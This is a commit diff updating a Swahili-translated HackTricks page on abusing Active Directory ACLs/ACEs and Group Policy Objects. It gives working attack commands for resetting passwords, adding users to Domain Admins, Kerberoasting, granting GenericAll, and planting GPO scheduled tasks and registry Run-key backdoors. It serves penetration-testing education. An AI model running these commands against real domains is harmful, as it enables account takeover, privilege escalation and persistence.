mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/windows-hardening/windows-local-privilege-escalation/dl
This commit is contained in:
Translator
parent
3c943c3cb0
commit
a6a06e1e91
@ -238,7 +238,6 @@
|
||||
- [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
|
||||
- [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
|
||||
- [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md)
|
||||
- [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
|
||||
- [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)
|
||||
- [Access Tokens](windows-hardening/windows-local-privilege-escalation/access-tokens.md)
|
||||
- [ACLs - DACLs/SACLs/ACEs](windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md)
|
||||
|
||||
@ -1,8 +1,8 @@
|
||||
# Kutumia Vibaya Active Directory ACLs/ACEs
|
||||
# Kutumia vibaya Active Directory ACLs/ACEs
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**Ukurasa huu ni muhtasari wa mbinu kutoka** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **na** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**. Kwa maelezo zaidi, angalia makala asili.**
|
||||
**Ukurasa huu ni muhtasari wa mbinu kutoka** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **na** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**. Kwa maelezo zaidi, angalia makala za asili.**
|
||||
|
||||
## BadSuccessor
|
||||
|
||||
@ -13,30 +13,45 @@ BadSuccessor.md
|
||||
|
||||
## **Haki za GenericAll kwa Mtumiaji**
|
||||
|
||||
Haki hii inampa mshambuliaji udhibiti kamili wa akaunti ya mtumiaji anayelengwa. Mara haki za `GenericAll` zinapothibitishwa kwa kutumia amri ya `Get-ObjectAcl`, mshambuliaji anaweza:
|
||||
Haki hii inampa mshambuliaji udhibiti kamili juu ya akaunti ya mtumiaji lengwa. Mara haki za `GenericAll` zinapothibitishwa kwa kutumia amri `Get-ObjectAcl`, mshambuliaji anaweza:
|
||||
|
||||
- **Badilisha Nenosiri la Lengo**: Kutumia `net user <username> <password> /domain`, mshambuliaji anaweza kuweka upya nenosiri la mtumiaji.
|
||||
- **Targeted Kerberoasting**: Kuweka SPN kwenye akaunti ya mtumiaji ili kuiifanya kerberoastable, kisha tumia Rubeus na targetedKerberoast.py kutoa na kujaribu kuvunja hash za ticket-granting ticket (TGT).
|
||||
- **Badilisha Nenosiri la Lengo**: Kwa kutumia `net user <username> <password> /domain`, mshambuliaji anaweza kuweka upya nenosiri la mtumiaji.
|
||||
- Kutoka Linux, unaweza kufanya vivyo hivyo kwa SAMR kwa kutumia Samba `net rpc`:
|
||||
```bash
|
||||
# Reset target user's password over SAMR from Linux
|
||||
net rpc password <samAccountName> '<NewPass>' -U <domain>/<user>%'<pass>' -S <dc_fqdn>
|
||||
```
|
||||
- **Ikiwa akaunti imezimwa, ondoa bendera ya UAC**: `GenericAll` inaruhusu kuhariri `userAccountControl`. Kutoka Linux, BloodyAD inaweza kuondoa bendera ya `ACCOUNTDISABLE`:
|
||||
```bash
|
||||
bloodyAD --host <dc_fqdn> -d <domain> -u <user> -p '<pass>' remove uac <samAccountName> -f ACCOUNTDISABLE
|
||||
```
|
||||
- **Targeted Kerberoasting**: Weka SPN kwenye akaunti ya mtumiaji ili kuifanya kerberoastable, kisha tumia Rubeus na targetedKerberoast.py kunyakua na kujaribu kuvunja hashes za ticket-granting ticket (TGT).
|
||||
```bash
|
||||
Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
|
||||
.\Rubeus.exe kerberoast /user:<username> /nowrap
|
||||
Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -Verbose
|
||||
```
|
||||
- **Targeted ASREPRoasting**: Zima pre-authentication kwa mtumiaji, ukifanya akaunti yao iwe hatarini kwa ASREPRoasting.
|
||||
- **Targeted ASREPRoasting**: Zima pre-authentication kwa mtumiaji, na kufanya akaunti yao kuwa nyeti kwa ASREPRoasting.
|
||||
```bash
|
||||
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
|
||||
```
|
||||
- **Shadow Credentials / Key Credential Link**: Kwa `GenericAll` kwenye mtumiaji unaweza kuongeza uthibitisho unaotegemea cheti na kuingia kama wao bila kubadilisha nenosiri lao. Tazama:
|
||||
|
||||
{{#ref}}
|
||||
shadow-credentials.md
|
||||
{{#endref}}
|
||||
|
||||
## **Haki za GenericAll kwenye Kundi**
|
||||
|
||||
Haki hii inamwezesha mshambuliaji kubadilisha uanachama wa vikundi ikiwa ana haki za `GenericAll` kwenye kundi kama `Domain Admins`. Baada ya kutambua distinguished name ya kundi kwa kutumia `Get-NetGroup`, mshambuliaji anaweza:
|
||||
Haki hii inamruhusu mshambuliaji kudhibiti uanachama wa kundi ikiwa wana haki za `GenericAll` kwenye kundi kama `Domain Admins`. Baada ya kubaini distinguished name ya kundi kwa kutumia `Get-NetGroup`, mshambuliaji anaweza:
|
||||
|
||||
- **Kujiongeza kwenye kundi la `Domain Admins`**: Hii inaweza kufanywa kupitia amri za moja kwa moja au kwa kutumia modules kama Active Directory au PowerSploit.
|
||||
- **Add Themselves to the Domain Admins Group**: Hii inaweza kufanywa kwa amri za moja kwa moja au kwa kutumia modules kama Active Directory au PowerSploit.
|
||||
```bash
|
||||
net group "domain admins" spotless /add /domain
|
||||
Add-ADGroupMember -Identity "domain admins" -Members spotless
|
||||
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
|
||||
```
|
||||
- Kutoka Linux unaweza pia kutumia BloodyAD kujiongezea kwenye vikundi vyovyote endapo una uanachama wa GenericAll/Write juu yao. Ikiwa kundi lengwa limejumuishwa ndani ya “Remote Management Users”, utapata mara moja ufikiaji wa WinRM kwenye hosts zinazoheshimu kundi hilo:
|
||||
- Kutoka Linux unaweza pia kutumia BloodyAD kujiongezea kwenye vikundi vyovyote pale unapokuwa na uanachama wa GenericAll/Write juu yao. Ikiwa kundi lengwa limewekwa ndani ya “Remote Management Users”, utaipata mara moja ufikiaji wa WinRM kwenye hosts zinazoheshimu kundi hilo:
|
||||
```bash
|
||||
# Linux tooling example (BloodyAD) to add yourself to a target group
|
||||
bloodyAD --host <dc-fqdn> -d <domain> -u <user> -p '<pass>' add groupMember "<Target Group>" <user>
|
||||
@ -46,35 +61,35 @@ netexec winrm <dc-fqdn> -u <user> -p '<pass>'
|
||||
```
|
||||
## **GenericAll / GenericWrite / Write on Computer/User**
|
||||
|
||||
Kuwa na ruhusa hizi kwenye kitu cha kompyuta au akaunti ya mtumiaji kunaruhusu:
|
||||
Kuwa na vibali hivi kwenye objekti ya kompyuta au kwenye akaunti ya mtumiaji kunaruhusu:
|
||||
|
||||
- **Kerberos Resource-based Constrained Delegation**: Inaruhusu kuchukua udhibiti wa kitu cha kompyuta.
|
||||
- **Shadow Credentials**: Tumia mbinu hii kuiga kompyuta au akaunti ya mtumiaji kwa kutumia ruhusa kuunda shadow credentials.
|
||||
- **Kerberos Resource-based Constrained Delegation**: Inaruhusu kuchukua udhibiti wa objekti ya kompyuta.
|
||||
- **Shadow Credentials**: Tumia mbinu hii kuiga objekti ya kompyuta au akaunti ya mtumiaji kwa kutumia vibali kuunda shadow credentials.
|
||||
|
||||
## **WriteProperty on Group**
|
||||
|
||||
Ikiwa mtumiaji ana haki za `WriteProperty` kwenye vitu vyote vya kikundi fulani (mfano, `Domain Admins`), wanaweza:
|
||||
Ikiwa mtumiaji ana haki za `WriteProperty` kwa vitu vyote vya kundi fulani (kwa mfano, `Domain Admins`), wanaweza:
|
||||
|
||||
- **Kujiongeza kwenye kikundi la Domain Admins**: Inaweza kufikiwa kwa kuchanganya amri za `net user` na `Add-NetGroupUser`; mbinu hii inaruhusu kupandisha hadhi ya ruhusa ndani ya domain.
|
||||
- **Kujiongezea kwenye Domain Admins Group**: Inayowezekana kwa kuchanganya amri za `net user` na `Add-NetGroupUser`, mbinu hii inaruhusu privilege escalation ndani ya domain.
|
||||
```bash
|
||||
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
|
||||
```
|
||||
## **Self (Self-Membership) on Group**
|
||||
|
||||
Haki hii inawawezesha washambuliaji kujiongeza wenyewe kwa vikundi maalum, kama `Domain Admins`, kupitia amri zinazobadilisha uanachama wa kikundi moja kwa moja. Kutumia mfululizo wa amri ufuatao kunaruhusu kujiongeza mwenyewe:
|
||||
Idhini hii inawawezesha washambuliaji kujiongezea kwenye makundi maalum, kama `Domain Admins`, kwa kutumia amri zinazobadilisha uanachama wa kikundi moja kwa moja. Kutumia mfuatano wa amri ufuatao kunaruhusu kujiongezea:
|
||||
```bash
|
||||
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
|
||||
```
|
||||
## **WriteProperty (Self-Membership)**
|
||||
|
||||
Haki inayofanana, hii inawawezesha washambuliaji kujiongeza moja kwa moja kwenye vikundi kwa kubadilisha sifa za kikundi ikiwa wana haki ya `WriteProperty` kwenye vikundi hivyo. Uthibitisho na utekelezaji wa haki hii hufanywa na:
|
||||
Haki inayofanana, hii inawawezesha washambuliaji kujiunga moja kwa moja na vikundi kwa kubadilisha mali za vikundi ikiwa wana haki ya `WriteProperty` kwenye vikundi hivyo. Uthibitisho na utekelezaji wa haki hii hufanywa kwa:
|
||||
```bash
|
||||
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
|
||||
net group "domain admins" spotless /add /domain
|
||||
```
|
||||
## **ForceChangePassword**
|
||||
|
||||
Kushikilia `ExtendedRight` kwa mtumiaji kwa `User-Force-Change-Password` kunaruhusu kuweka nywila upya bila kujua nywila ya sasa. Uhakiki wa haki hii na exploitation yake yanaweza kufanywa kupitia PowerShell au zana nyingine za mstari wa amri, zikitoa mbinu kadhaa za kuweka upya nywila ya mtumiaji, ikijumuisha interactive sessions na one-liners kwa mazingira yasiyo ya kuingiliana. Amri zinaanzia kutoka miito rahisi za PowerShell hadi kutumia `rpcclient` kwenye Linux, zikionyesha utofauti wa attack vectors.
|
||||
Kushikilia `ExtendedRight` kwa mtumiaji kwa ajili ya `User-Force-Change-Password` kunaruhusu kuweka upya nywila bila kujua nywila ya sasa. Uhakiki wa haki hii na matumizi yake unaweza kufanywa kupitia PowerShell au zana nyingine za command-line, zikitoa mbinu kadhaa za kuweka upya nywila ya mtumiaji, ikiwa ni pamoja na interactive sessions na one-liners kwa mazingira yasiyo na mwingiliano. Amri zinatofautiana kutoka kwa miito rahisi za PowerShell hadi matumizi ya `rpcclient` kwenye Linux, zikionesha utofauti wa attack vectors.
|
||||
```bash
|
||||
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
||||
Set-DomainUserPassword -Identity delegate -Verbose
|
||||
@ -85,23 +100,23 @@ Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureStri
|
||||
rpcclient -U KnownUsername 10.10.10.192
|
||||
> setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!'
|
||||
```
|
||||
## **WriteOwner kwenye kikundi**
|
||||
## **WriteOwner kwenye Kundi**
|
||||
|
||||
Iwapo mshambuliaji atagundua kwamba ana haki za `WriteOwner` kwa kikundi, anaweza kubadilisha umiliki wa kikundi kwa ajili yake mwenyewe. Hii ina athari kubwa hasa wakati kikundi kinachohusika ni `Domain Admins`, kwa kuwa kubadilisha umiliki kunaruhusu udhibiti mpana wa sifa za kikundi na uanachama. Mchakato unajumuisha kutambua kitu sahihi kwa kutumia `Get-ObjectAcl` na kisha kutumia `Set-DomainObjectOwner` kubadilisha mmiliki, ama kwa SID au kwa jina.
|
||||
Ikiwa mshambulizi anagundua kuwa ana haki za `WriteOwner` juu ya kundi, anaweza kubadilisha umiliki wa kundi kwao. Hii ina athari kubwa hasa wakati kundi husika ni `Domain Admins`, kwani kubadilisha umiliki kunaruhusu udhibiti mpana zaidi juu ya sifa za kundi na uanachama. Mchakato unajumuisha kubaini kitu sahihi kupitia `Get-ObjectAcl` na kisha kutumia `Set-DomainObjectOwner` kubadilisha mmiliki, ama kwa SID au kwa jina.
|
||||
```bash
|
||||
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
|
||||
Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose
|
||||
Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
|
||||
```
|
||||
## **GenericWrite kwa User**
|
||||
## **GenericWrite on Mtumiaji**
|
||||
|
||||
Ruhusa hii inamruhusu attacker kubadilisha sifa za User. Hasa, kwa kupata ruhusa ya `GenericWrite`, attacker anaweza kubadilisha njia ya logon script ya User ili kuendesha script hasidi wakati User anapofanya logon. Hii inafikiwa kwa kutumia amri ya `Set-ADObject` kusasisha mali ya `scriptpath` ya User lengwa ili kuonyesha kwenye script ya attacker.
|
||||
Ruhusa hii inaruhusu mshambuliaji kurekebisha sifa za mtumiaji. Hasa, kwa ufikiaji wa `GenericWrite`, mshambuliaji anaweza kubadilisha njia ya logon script ya mtumiaji ili kuendesha script yenye madhara wakati mtumiaji anapoingia. Hii inafikiwa kwa kutumia amri ya `Set-ADObject` kusasisha sifa ya `scriptpath` ya mtumiaji lengwa ili kuelekeza kwenye script ya mshambuliaji.
|
||||
```bash
|
||||
Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"
|
||||
```
|
||||
## **GenericWrite on Group**
|
||||
|
||||
Kwa ruhusa hii, wadukuzi wanaweza kubadili uanachama wa group, kama vile kujiongezea wenyewe au watumiaji wengine katika vikundi maalum. Mchakato huu unajumuisha kuunda credential object, kuitumia kuongeza au kuondoa watumiaji kutoka kwenye group, na kuthibitisha mabadiliko ya uanachama kwa amri za PowerShell.
|
||||
Kwa kibali hiki, washambuliaji wanaweza kubadilisha uanachama wa vikundi, kama kuongeza wao wenyewe au watumiaji wengine kwenye vikundi maalum. Mchakato huu unahusisha kuunda credential object (kitu cha cheti), kuitumia kuongeza au kuondoa watumiaji kutoka kwenye kikundi, na kuthibitisha mabadiliko ya uanachama kwa kutumia amri za PowerShell.
|
||||
```bash
|
||||
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
|
||||
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
|
||||
@ -109,11 +124,16 @@ Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'userna
|
||||
Get-DomainGroupMember -Identity "Group Name" | Select MemberName
|
||||
Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose
|
||||
```
|
||||
- Kutoka Linux, Samba `net` inaweza kuongeza/kuondoa wanachama ukiwa na `GenericWrite` kwenye kundi (inayofaa wakati PowerShell/RSAT hazipatikani):
|
||||
```bash
|
||||
# Add yourself to the target group via SAMR
|
||||
net rpc group addmem "<Group Name>" <user> -U <domain>/<user>%'<pass>' -S <dc_fqdn>
|
||||
# Verify current members
|
||||
net rpc group members "<Group Name>" -U <domain>/<user>%'<pass>' -S <dc_fqdn>
|
||||
```
|
||||
## **WriteDACL + WriteOwner**
|
||||
|
||||
Kumiliki kitu cha AD na kuwa na ruhusa za `WriteDACL` juu yake kunamwezesha attacker kujipa ruhusa za `GenericAll` juu ya kitu hicho.
|
||||
|
||||
Hii inafikiwa kupitia ADSI manipulation, ikiruhusu udhibiti kamili wa kitu hicho na uwezo wa kubadilisha uanachama wake wa vikundi. Hata hivyo, kuna vikwazo vinavyopo unapo jaribu exploit ruhusa hizi kwa kutumia Active Directory module's `Set-Acl` / `Get-Acl` cmdlets.
|
||||
Kuwa mmiliki wa objekti ya AD na kuwa na ruhusa za `WriteDACL` juu yake humuwezesha mshambuliaji kujipa ruhusa za `GenericAll` kwa objekti hiyo. Hii inafikiwa kupitia ADSI manipulation, ikiruhusu udhibiti kamili wa objekti na uwezo wa kubadilisha uanachama wake wa vikundi. Hata hivyo, kuna vikwazo linapojaribu exploit ruhusa hizi kwa kutumia moduli ya Active Directory `Set-Acl` / `Get-Acl` cmdlets.
|
||||
```bash
|
||||
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
|
||||
$IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier])
|
||||
@ -121,66 +141,139 @@ $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityRe
|
||||
$ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)
|
||||
$ADSI.psbase.commitchanges()
|
||||
```
|
||||
## **Kurudishana kwenye Domain (DCSync)**
|
||||
### WriteDACL/WriteOwner uchukuzi wa haraka (PowerView)
|
||||
|
||||
Shambulio la DCSync linatumia ruhusa maalum za replication kwenye domain ili kujigania kuwa Domain Controller na kusawazisha data, pamoja na kredenshiali za watumiaji. Mbinu hii yenye nguvu inahitaji ruhusa kama `DS-Replication-Get-Changes`, ikiruhusu washambuliaji kutoa taarifa nyeti kutoka kwa mazingira ya AD bila kupata ufikiaji wa moja kwa moja kwenye Domain Controller. [**Jifunze zaidi kuhusu shambulio la DCSync hapa.**](../dcsync.md)
|
||||
Unapokuwa na `WriteOwner` na `WriteDacl` juu ya akaunti ya mtumiaji au akaunti ya huduma, unaweza kuchukua udhibiti kamili na kuweka upya nenosiri lake kwa kutumia PowerView bila kujua nenosiri la zamani:
|
||||
```powershell
|
||||
# Load PowerView
|
||||
. .\PowerView.ps1
|
||||
|
||||
# Grant yourself full control over the target object (adds GenericAll in the DACL)
|
||||
Add-DomainObjectAcl -Rights All -TargetIdentity <TargetUserOrDN> -PrincipalIdentity <YouOrYourGroup> -Verbose
|
||||
|
||||
# Set a new password for the target principal
|
||||
$cred = ConvertTo-SecureString 'P@ssw0rd!2025#' -AsPlainText -Force
|
||||
Set-DomainUserPassword -Identity <TargetUser> -AccountPassword $cred -Verbose
|
||||
```
|
||||
Vidokezo:
|
||||
- Unaweza kuhitaji kwanza kubadilisha mmiliki kuwa wewe ikiwa una `WriteOwner` tu:
|
||||
```powershell
|
||||
Set-DomainObjectOwner -Identity <TargetUser> -OwnerIdentity <You>
|
||||
```
|
||||
- Thibitisha upatikanaji kwa kutumia itifaki yoyote (SMB/LDAP/RDP/WinRM) baada ya kuweka upya nenosiri.
|
||||
|
||||
## **Replikesheni kwenye Domain (DCSync)**
|
||||
|
||||
Shambulio la DCSync linatumia ruhusa maalumu za replikesheni kwenye domain kuiga Domain Controller na kusawazisha data, ikiwa ni pamoja na cheti/nenosiri za watumiaji. Mbinu hii yenye nguvu inahitaji ruhusa kama `DS-Replication-Get-Changes`, ikiruhusu washambuliaji kunyakua taarifa nyeti kutoka mazingira ya AD bila kupata moja kwa moja Domain Controller. [**Learn more about the DCSync attack here.**](../dcsync.md)
|
||||
|
||||
## Ugawaji wa GPO <a href="#gpo-delegation" id="gpo-delegation"></a>
|
||||
|
||||
### Ugawaji wa GPO
|
||||
|
||||
Ufikiaji uliogawiwa wa kusimamia Group Policy Objects (GPOs) unaweza kuleta hatari kubwa za usalama. Kwa mfano, ikiwa mtumiaji kama `offense\spotless` amepewa haki za kusimamia GPO, anaweza kuwa na vibali kama **WriteProperty**, **WriteDacl**, na **WriteOwner**. Vibali hivi vinaweza kutumika vibaya kwa madhumuni mabaya, kama inavyobainika kwa kutumia PowerView: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
|
||||
Upatikanaji uliogawanywa wa kusimamia Group Policy Objects (GPOs) unaweza kuleta hatari kubwa za usalama. Kwa mfano, ikiwa mtumiaji kama `offense\spotless` amepewa haki za kusimamia GPO, anaweza kuwa na vibali kama **WriteProperty**, **WriteDacl**, na **WriteOwner**. Vibali hivi vinaweza kutumika vibaya kwa madhumuni mabaya, kama inavyoonekana kwa kutumia PowerView: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
|
||||
|
||||
### Kuorodhesha Vibali vya GPO
|
||||
### Orodhesha Vibali vya GPO
|
||||
|
||||
Ili kubaini GPOs zilizo na usanidi mbaya, cmdlets za PowerSploit zinaweza kuunganishwa pamoja. Hii inaruhusu kugundua GPOs ambazo mtumiaji maalum ana ruhusa za kusimamia: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
|
||||
Ili kubaini GPOs zilizo na usanidi mbaya, cmdlets za PowerSploit zinaweza kuunganishwa pamoja. Hii inaruhusu kugundua GPOs ambazo mtumiaji fulani ana ruhusa za kuzisimamia: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
|
||||
|
||||
**Kompyuta zilizo na Sera Imetumika**: Inawezekana kubaini kompyuta ambazo GPO fulani inatumika, kusaidia kuelewa wigo wa athari zinazowezekana. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
|
||||
**Kompyuta Zenye Sera Imetumika**: Inawezekana kubaini ni kompyuta zipi Sera fulani inatumika nazo, ikisaidia kuelewa wigo wa athari zinazowezekana. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
|
||||
|
||||
**Sera Zilizotumika kwa Kompyuta Fulani**: Ili kuona ni sera gani zilizotumika kwa kompyuta fulani, amri kama `Get-DomainGPO` zinaweza kutumika.
|
||||
**Sera Zinazotumika kwa Kompyuta Iliyotajwa**: Ili kuona sera zinazotumika kwa kompyuta maalumu, amri kama `Get-DomainGPO` zinaweza kutumika.
|
||||
|
||||
**OUs zilizo na Sera Iliyotumika**: Kutambua vitengo vya shirika (OUs) vilivyoathiriwa na sera fulani kunaweza kufanywa kwa kutumia `Get-DomainOU`.
|
||||
**OUs Zenye Sera Imetumika**: Kutambua organizational units (OUs) zilizoathiriwa na sera fulani kunaweza kufanywa kwa kutumia `Get-DomainOU`.
|
||||
|
||||
Unaweza pia kutumia zana [**GPOHound**](https://github.com/cogiceo/GPOHound) kuorodhesha GPOs na kupata matatizo ndani yao.
|
||||
|
||||
### Kutumia Vibaya GPO - New-GPOImmediateTask
|
||||
|
||||
GPOs zilizo sanidiwa vibaya zinaweza kutumiwa kuendesha code, kwa mfano, kwa kuunda kazi ya ratiba inayotekelezwa mara moja. Hii inaweza kutumika kuongeza mtumiaji kwenye kikundi cha local administrators kwenye mashine zilizoathiriwa, na hivyo kuongeza kwa kiasi kikubwa viwango vya ruhusa:
|
||||
GPOs zilizo na usanidi mbaya zinaweza kutumika kusababisha utekelezaji wa code, kwa mfano, kwa kuunda task ya scheduled inayotekelezwa mara moja. Hii inaweza kutumiwa kuongeza mtumiaji kwenye kundi la local administrators kwenye mashine zilizoathiriwa, na hivyo kuinua vibali kwa kiasi kikubwa:
|
||||
```bash
|
||||
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
|
||||
```
|
||||
### GroupPolicy module - Abuse GPO
|
||||
|
||||
The GroupPolicy module, ikiwa imewekwa, inaruhusu uundaji na kuunganisha GPOs mpya, pamoja na kuweka mapendeleo kama registry values ili kutekeleza backdoors kwenye kompyuta zilizoathiriwa. Mbinu hii inahitaji GPO kusasishwa na mtumiaji kuingia kwenye kompyuta ili utekelezaji ufanyike:
|
||||
The GroupPolicy module, ikiwa imewekwa, inaruhusu kuunda na kuunganisha GPOs mpya, na kuweka preferences kama registry values ili kuendesha backdoors kwenye kompyuta zilizoathiriwa. Njia hii inahitaji GPO kusasishwa na mtumiaji kuingia kwenye kompyuta ili utekelezaji ufanyike:
|
||||
```bash
|
||||
New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
|
||||
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString
|
||||
```
|
||||
### SharpGPOAbuse - Abuse GPO
|
||||
|
||||
SharpGPOAbuse inatoa njia ya abuse GPOs zilizopo kwa kuongeza tasks au kubadilisha settings bila hitaji la kuunda GPOs mpya. Zana hii inahitaji uhariri wa GPOs zilizopo au kutumia RSAT tools kuunda GPOs mpya kabla ya kutekeleza mabadiliko:
|
||||
SharpGPOAbuse hutoa njia ya kutumia kwa mbaya GPOs zilizopo kwa kuongeza kazi au kubadilisha mipangilio bila hitaji la kuunda GPOs mpya. Zana hii inahitaji mabadiliko ya GPOs zilizopo au kutumia RSAT kuunda mpya kabla ya kutekeleza mabadiliko:
|
||||
```bash
|
||||
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc-2\software\pivot.exe" --GPOName "PowerShell Logging"
|
||||
```
|
||||
### Leteza Sasisho la Sera
|
||||
### Lazimisha Sasisho la Sera
|
||||
|
||||
Sasisho za GPO kwa kawaida hufanyika takriban kila dakika 90. Ili kuharakisha mchakato huu, hasa baada ya kutekeleza mabadiliko, agizo `gpupdate /force` linaweza kutumika kwenye kompyuta ya lengo ili kulazimisha sasisho la sera mara moja. Agizo hili linahakikisha kuwa marekebisho yoyote ya GPOs yatekelezwa bila kusubiri mzunguko wa sasisho la kiotomatiki.
|
||||
Mabadiliko ya GPO kwa kawaida hufanyika kila takriban dakika 90. Ili kuharakisha mchakato huu, hasa baada ya kufanya mabadiliko, amri `gpupdate /force` inaweza kutumika kwenye kompyuta ya lengo ili kulazimisha sasisho la sera mara moja. Amri hii inahakikisha kwamba mabadiliko yoyote kwenye GPOs yanatekelezwa bila kusubiri mzunguko wa sasisho la kiotomatiki ufuatao.
|
||||
|
||||
### Ndani ya Mfumo
|
||||
|
||||
Ukikagua Scheduled Tasks za GPO fulani, kama `Misconfigured Policy`, unaweza kuthibitisha kuongezwa kwa kazi kama `evilTask`. Kazi hizi zimeundwa kupitia scripts au zana za command-line zinazolenga kubadilisha tabia za mfumo au kuongeza uwezo wa kusimamisha haki.
|
||||
Baada ya kukagua Scheduled Tasks kwa GPO fulani, kama `Misconfigured Policy`, kuongeza kwa kazi kama `evilTask` kunaweza kuthibitishwa. Kazi hizi zinaundwa kwa kutumia scripts au zana za command-line zinalenga kubadilisha tabia ya mfumo au kuongeza viwango vya ruhusa.
|
||||
|
||||
Muundo wa kazi, kama vile unaoonyeshwa katika faili ya usanidi ya XML iliyotengenezwa na `New-GPOImmediateTask`, unaelezea maelezo maalum ya kazi iliyopangwa - ikiwa ni pamoja na amri itakayotekelezwa na vichocheo vyake. Faili hii inaonyesha jinsi kazi zilizopangwa zinasainiwa na kusimamiwa ndani ya GPOs, ikitoa njia ya kutekeleza amri au scripts yoyote kama sehemu ya utekelezaji wa sera.
|
||||
Muundo wa kazi, kama unaonyeshwa katika faili ya usanidi ya XML iliyotengenezwa na `New-GPOImmediateTask`, unaeleza maelezo maalum ya Scheduled Task - ikijumuisha amri itakayotekelezwa na triggers zake. Faili hili linaonyesha jinsi Scheduled Tasks zinavyofafanuliwa na kusimamiwa ndani ya GPOs, likitoa njia ya kutekeleza amri au scripts yoyote kama sehemu ya utekelezaji wa sera.
|
||||
|
||||
### Watumiaji na Vikundi
|
||||
|
||||
GPOs pia huruhusu udhibiti wa uanachama wa watumiaji na vikundi kwenye mifumo ya lengo. Kwa kuhariri faili za sera za Watumiaji na Vikundi moja kwa moja, wadukuzi wanaweza kuongeza watumiaji kwenye vikundi vyenye mamlaka, kama vile kundi la ndani la `administrators`. Hii inawezekana kupitia uteuzi wa ruhusa za usimamizi wa GPO, ambayo inaruhusu mabadiliko ya faili za sera ili kujumuisha watumiaji wapya au kubadilisha uanachama wa vikundi.
|
||||
